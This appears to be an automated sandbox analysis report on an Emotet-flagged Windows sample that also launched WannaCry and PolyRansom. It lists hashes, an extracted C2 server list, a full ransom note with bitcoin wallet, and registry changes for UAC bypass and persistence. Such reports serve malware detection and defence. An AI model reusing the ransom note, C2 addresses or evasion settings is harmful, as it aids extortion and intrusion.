emotet | 35091e1314cf0ce5b7fc7c4d5f8e62bae5de7054b8f635026cafd4cee3a5912e

Resubmissions

14-08-2024 00:49

240814-a6vk4ashrb 10

14-08-2024 00:42

240814-a2f7xasgqc 10

13-08-2024 22:37

240813-2j8yravcmn 10

Analysis

max time kernel
408s
max time network
411s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14-08-2024 00:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
Size

149KB
MD5

95062f159bddce1c47bd708d8d244370
SHA1

4f1742f0f5cc4e19ded0654080ee0b8931c98c69
SHA256

35091e1314cf0ce5b7fc7c4d5f8e62bae5de7054b8f635026cafd4cee3a5912e
SHA512

b7855c6491aeb5476de2c63f7474016b358f514aed0423140e9b7c85dd44f8559040bf3f0d50b0a961310d6eab7d81d00454941ce94c3a84e01fde6615f4a879
SSDEEP

3072:ufDd+s5q0Fy/3sU6OtX+9F1cYsyE5+FAdjI:uLng/H6w+L163NdU

Score

10^/10

emotet wannacry epoch1 aspackv2 banker defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan worm

Malware Config

Extracted

Family

emotet

Botnet

Epoch1

128.92.203.42:80

37.187.161.206:8080

202.29.239.162:443

80.87.201.221:7080

190.188.245.242:80

12.163.208.58:80

213.197.182.158:8080

201.213.177.139:80

62.84.75.50:80

45.33.77.42:8080

185.183.16.47:80

78.249.119.122:80

177.129.17.170:443

51.15.7.189:80

152.169.22.67:80

119.106.216.84:80

109.169.12.78:80

51.15.7.145:80

219.92.13.25:80

190.117.79.209:80

rsa_pubkey.plain

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Modifies visibility of file extensions in Explorer 2 TTPs 13 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 13 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Emotet payload 3 IoCs

Detects Emotet payload in memory.

trojan banker

resource	yara_rule
behavioral2/memory/4856-4-0x00000000005B0000-0x00000000005C0000-memory.dmp	emotet
behavioral2/memory/4856-0-0x0000000000590000-0x00000000005A2000-memory.dmp	emotet
behavioral2/memory/4856-7-0x0000000000580000-0x000000000058F000-memory.dmp	emotet

Downloads MZ/PE file

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0009000000023558-793.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	aAIAcUkE.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDFA1.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDFB7.tmp	WannaCry.exe

Executes dropped EXE 37 IoCs

pid	Process
5032	Avoid (1).exe
5980	Avoid (1).exe
4912	Avoid (1).exe
3788	Avoid (1).exe
4628	Avoid (1).exe
5156	Avoid (1).exe
2496	Avoid (1).exe
4668	Avoid (1).exe
6124	Avoid (1).exe
6068	Avoid (1).exe
4456	Avoid (1).exe
4112	Avoid (1).exe
5892	WindowsUpdate.exe
4188	WindowsUpdate.exe
5848	PolyRansom.exe
2756	PolyRansom.exe
5056	aAIAcUkE.exe
5416	XCUkkEIA.exe
5408	PolyRansom.exe
2608	PolyRansom.exe
5660	PolyRansom.exe
2180	PolyRansom.exe
552	PolyRansom.exe
3268	PolyRansom.exe
516	PolyRansom.exe
1628	PolyRansom.exe
5444	PolyRansom.exe
5464	PolyRansom.exe
116	PolyRansom.exe
3172	WannaCry.exe
5708	WannaCry.exe
5764	!WannaDecryptor!.exe
5724	WannaCry.exe
5932	WannaCry.exe
5152	!WannaDecryptor!.exe
5456	!WannaDecryptor!.exe
5788	!WannaDecryptor!.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aAIAcUkE.exe = "C:\\Users\\Admin\\ZScsUgoE\\aAIAcUkE.exe"	PolyRansom.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XCUkkEIA.exe = "C:\\ProgramData\\vQQoAgkY\\XCUkkEIA.exe"	PolyRansom.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aAIAcUkE.exe = "C:\\Users\\Admin\\ZScsUgoE\\aAIAcUkE.exe"	aAIAcUkE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XCUkkEIA.exe = "C:\\ProgramData\\vQQoAgkY\\XCUkkEIA.exe"	XCUkkEIA.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	WannaCry.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
116	raw.githubusercontent.com
117	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aAIAcUkE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
5340	taskkill.exe
3856	taskkill.exe
6128	taskkill.exe
4620	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-945322488-2060912225-3527527000-1000\{EE2CB17D-9476-46AE-BBB0-DA3A7B59F9DC}	msedge.exe

Modifies registry key 1 TTPs 39 IoCs

Modify Registry

T1112

pid	Process
5308	reg.exe
3856	reg.exe
3488	reg.exe
2812	reg.exe
3528	reg.exe
5532	reg.exe
116	reg.exe
1652	reg.exe
5880	reg.exe
2984	reg.exe
3552	reg.exe
3696	reg.exe
5548	reg.exe
5712	reg.exe
5764	reg.exe
5700	reg.exe
4660	reg.exe
1188	reg.exe
4372	reg.exe
1628	reg.exe
1756	reg.exe
4556	reg.exe
6084	reg.exe
5788	reg.exe
5404	reg.exe
6028	reg.exe
5716	reg.exe
3592	reg.exe
3200	reg.exe
2852	reg.exe
552	reg.exe
1408	reg.exe
3832	reg.exe
2628	reg.exe
3452	reg.exe
3440	reg.exe
2628	reg.exe
5568	reg.exe
1628	reg.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 949523.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 43072.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 788703.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 281614.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 747974.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
688	msedge.exe
688	msedge.exe
4264	msedge.exe
4264	msedge.exe
5052	identity_helper.exe
5052	identity_helper.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
916	msedge.exe
916	msedge.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
5028	msedge.exe
5028	msedge.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
5508	msedge.exe
5508	msedge.exe
4188	WindowsUpdate.exe
4188	WindowsUpdate.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
4856	95062f159bddce1c47bd708d8d244370_JaffaCakes118.exe
5308	msedge.exe
5308	msedge.exe
5308	msedge.exe
5308	msedge.exe
5776	msedge.exe
5776	msedge.exe
5848	PolyRansom.exe
5848	PolyRansom.exe
5848	PolyRansom.exe
5848	PolyRansom.exe
2756	PolyRansom.exe
2756	PolyRansom.exe
2756	PolyRansom.exe
2756	PolyRansom.exe
5408	PolyRansom.exe
5408	PolyRansom.exe
5408	PolyRansom.exe
5408	PolyRansom.exe
2608	PolyRansom.exe
2608	PolyRansom.exe
2608	PolyRansom.exe
2608	PolyRansom.exe
5660	PolyRansom.exe
5660	PolyRansom.exe
5660	PolyRansom.exe
5660	PolyRansom.exe
2180	PolyRansom.exe
2180	PolyRansom.exe
2180	PolyRansom.exe
2180	PolyRansom.exe
552	PolyRansom.exe
552	PolyRansom.exe
552	PolyRansom.exe
552	PolyRansom.exe
3268	PolyRansom.exe
3268	PolyRansom.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5056	aAIAcUkE.exe
5788	!WannaDecryptor!.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs

pid	Process
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	5340	taskkill.exe
Token: SeDebugPrivilege	3856	taskkill.exe
Token: SeDebugPrivilege	6128	taskkill.exe
Token: SeDebugPrivilege	4620	taskkill.exe
Token: SeIncreaseQuotaPrivilege	5568	WMIC.exe
Token: SeSecurityPrivilege	5568	WMIC.exe
Token: SeTakeOwnershipPrivilege	5568	WMIC.exe
Token: SeLoadDriverPrivilege	5568	WMIC.exe
Token: SeSystemProfilePrivilege	5568	WMIC.exe
Token: SeSystemtimePrivilege	5568	WMIC.exe
Token: SeProfSingleProcessPrivilege	5568	WMIC.exe
Token: SeIncBasePriorityPrivilege	5568	WMIC.exe
Token: SeCreatePagefilePrivilege	5568	WMIC.exe
Token: SeBackupPrivilege	5568	WMIC.exe
Token: SeRestorePrivilege	5568	WMIC.exe
Token: SeShutdownPrivilege	5568	WMIC.exe
Token: SeDebugPrivilege	5568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5568	WMIC.exe
Token: SeRemoteShutdownPrivilege	5568	WMIC.exe
Token: SeUndockPrivilege	5568	WMIC.exe
Token: SeManageVolumePrivilege	5568	WMIC.exe
Token: 33	5568	WMIC.exe
Token: 34	5568	WMIC.exe
Token: 35	5568	WMIC.exe
Token: 36	5568	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5568	WMIC.exe
Token: SeSecurityPrivilege	5568	WMIC.exe
Token: SeTakeOwnershipPrivilege	5568	WMIC.exe
Token: SeLoadDriverPrivilege	5568	WMIC.exe
Token: SeSystemProfilePrivilege	5568	WMIC.exe
Token: SeSystemtimePrivilege	5568	WMIC.exe
Token: SeProfSingleProcessPrivilege	5568	WMIC.exe
Token: SeIncBasePriorityPrivilege	5568	WMIC.exe
Token: SeCreatePagefilePrivilege	5568	WMIC.exe
Token: SeBackupPrivilege	5568	WMIC.exe
Token: SeRestorePrivilege	5568	WMIC.exe
Token: SeShutdownPrivilege	5568	WMIC.exe
Token: SeDebugPrivilege	5568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5568	WMIC.exe
Token: SeRemoteShutdownPrivilege	5568	WMIC.exe
Token: SeUndockPrivilege	5568	WMIC.exe
Token: SeManageVolumePrivilege	5568	WMIC.exe
Token: 33	5568	WMIC.exe
Token: 34	5568	WMIC.exe
Token: 35	5568	WMIC.exe
Token: 36	5568	WMIC.exe
Token: SeBackupPrivilege	6076	vssvc.exe
Token: SeRestorePrivilege	6076	vssvc.exe
Token: SeAuditPrivilege	6076	vssvc.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
5032	Avoid (1).exe
5980	Avoid (1).exe
4912	Avoid (1).exe
3788	Avoid (1).exe
4628	Avoid (1).exe
5156	Avoid (1).exe
2496	Avoid (1).exe
4668	Avoid (1).exe
6124	Avoid (1).exe
6068	Avoid (1).exe
4456	Avoid (1).exe
4112	Avoid (1).exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe

Suspicious use of SendNotifyMessage 44 IoCs

pid	Process
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
5892	WindowsUpdate.exe
5892	WindowsUpdate.exe
5892	WindowsUpdate.exe
4188	WindowsUpdate.exe
4188	WindowsUpdate.exe
4188	WindowsUpdate.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
4264	msedge.exe
5892	WindowsUpdate.exe
5892	WindowsUpdate.exe
4188	WindowsUpdate.exe
4188	WindowsUpdate.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
5764	!WannaDecryptor!.exe
5764	!WannaDecryptor!.exe
5152	!WannaDecryptor!.exe
5152	!WannaDecryptor!.exe
5456	!WannaDecryptor!.exe
5456	!WannaDecryptor!.exe
5788	!WannaDecryptor!.exe
5788	!WannaDecryptor!.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4264 wrote to memory of 2524	4264	msedge.exe	99
PID 4264 wrote to memory of 2524	4264	msedge.exe	99
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
PID 4264 wrote to memory of 4924	4264	msedge.exe	100
